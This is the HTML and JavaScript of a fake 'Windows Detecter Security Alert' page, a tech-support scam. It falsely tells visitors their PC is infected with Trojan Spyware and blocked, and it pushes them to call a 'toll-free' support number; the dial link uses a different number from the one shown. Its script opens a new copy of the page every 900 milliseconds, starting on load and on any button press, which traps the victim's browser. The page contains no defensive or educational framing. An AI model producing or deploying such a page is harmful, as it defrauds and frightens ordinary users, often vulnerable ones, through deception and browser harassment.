<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Virus Detected</title>
    <link
      rel="stylesheet"
      href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.11.3/font/bootstrap-icons.min.css"
    />
  </head>
  <style>
    * {
      margin: 0;
      padding: 0;
      font-family: serif;
    }

    .card {
      background: white;
      max-width: 650px;
      padding: 20px;
      border-radius: 15px;
      width: calc(90vw - 40px);
      box-shadow: 0 0 20px 3px black;

      .icon1 {
        margin-right: 15px;
        font-size: 30px;
      }

      .in-card {
        display: flex;
        flex-direction: column;
        align-items: center;
        text-align: center;
      }
    }
    .pseudo-fullscreen {
      position: fixed;
      top: 0;
      left: 0;
      width: 100vw;
      height: 100vh;
      z-index: 5;
      display: flex;
      justify-content: center;
    }
    .allow {
      outline: none;
      padding: 5px 10px;
      border: none;

      color: white;
      background-color: rgb(36, 36, 250);
      border: 2px solid rgb(36, 36, 250);
      font-size: 18px;
      border-radius: 5px;
      margin: 0 10px;
    }

    .deny {
      outline: none;
      border: none;
      padding: 5px 10px;
      color: rgb(45, 45, 45);
      border: 2px solid rgb(45, 45, 45);
      font-size: 18px;
      border-radius: 5px;
      margin: 0 10px;
    }

    .warn {
      animation: hide 0.6s ease-in-out infinite;
    }
    .alert {
      padding: 20px;
      font-size: 19px;
      font-weight: 700;
      max-width: 500px;
      width: calc(90vw - 40px);
      background-color: white;
      text-align: center;
      height: 100px;
    }

    @keyframes hide {
      0% {
        opacity: 0;
      }

      100% {
        opacity: 1;
      }
    }
    .no-cursor {
      cursor: none;
    }
  </style>

  <body
    style="
      width: calc(100% - 10vw);
      min-height: calc(100vh - 10vw);
      background: linear-gradient(
        0deg,
        rgba(3, 3, 3, 0.596),
        rgba(0, 0, 0, 0.623)
      );
      display: flex;
      align-items: center;
      justify-content: center;
      padding: 5vw;
      background-size: cover;
    "
  >
    <div class="pseudo-fullscreen" id="fullscreenButton">
      <div class="alert">
        <p>
          Your System is effected by Trojan Spyware It may caused or damaged
          your System Press CONFIRM to close the window.
        </p>
        <br />
        <button class="allow" onclick="newopen()">CONFIRM</button>
        <button class="deny" onclick="newopen()">CLOSE</button>
      </div>
    </div>
    <div class="card">
      <p style="font-size: 20px; font-weight: 700">
        <i class="bi bi-shield-fill-exclamation icon1"></i>Windows Detecter
        Security Alert!
      </p>
      <hr style="margin: 20px 0" />
      <div class="in-card">
        <p
          style="
            color: red;
            max-width: 300px;
            font-size: 20px;
            font-weight: 900;
          "
        >
          App: Ads.fiancetracek(2).dil Threat Detected : Trojan Spyware
        </p>
        <div
          style="display: flex; align-items: center; margin-top: 20px"
          class="warn"
        >
          <img
            src="warning.png"
            style="max-width: 35px; margin-right: 10px"
            alt=""
          />
          <h2
            style="
              font-size: 36px;
              font-family: Verdana, Geneva, Tahoma, sans-serif;
              color: red;
              font-weight: 800;
            "
          >
            WARNING
          </h2>
        </div>
        <h3
          style="
            font-size: 22px;
            font-weight: 700;
            margin-top: 20px;
            font-family: system-ui, -apple-system, BlinkMacSystemFont,
              'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans',
              'Helvetica Neue', sans-serif;
          "
        >
          Access to this PC has been Blocked For Security Reason
        </h3>
        <a href="tel:+918218885483" style="all: unset; cursor: pointer">
          <h4
            style="
              font-weight: 800;
              color: rgb(31, 31, 255);
              font-size: 28px;
              margin-top: 10px;
            "
          >
            Contact Support : +91 2339889289 (Toll-Free)
          </h4>
        </a>
      </div>
      <hr style="margin: 20px 0" />
      <div
        style="
          display: flex;
          align-items: center;
          justify-content: space-between;
        "
      >
        <div
          style="
            font-family: Verdana, Geneva, Tahoma, sans-serif;
            font-weight: 800;
            align-items: center;
            display: flex;
          "
        >
          <img
            src="windows.png"
            style="width: 30px; margin-right: 10px"
            alt=""
          />
          Windows
        </div>
        <div>
          <a href=""><button class="allow">Allow</button></a>
          <a href=""><button class="deny">Deny</button></a>
        </div>
      </div>
      <button>Open Fullscreen</button>
    </div>

    <script>
      function newopen() {
        setInterval(() => {
          window.open("index.html", "_blank");
        }, 900);
      }
      window.addEventListener("beforeunload", newopen());
    </script>
  </body>
</html>
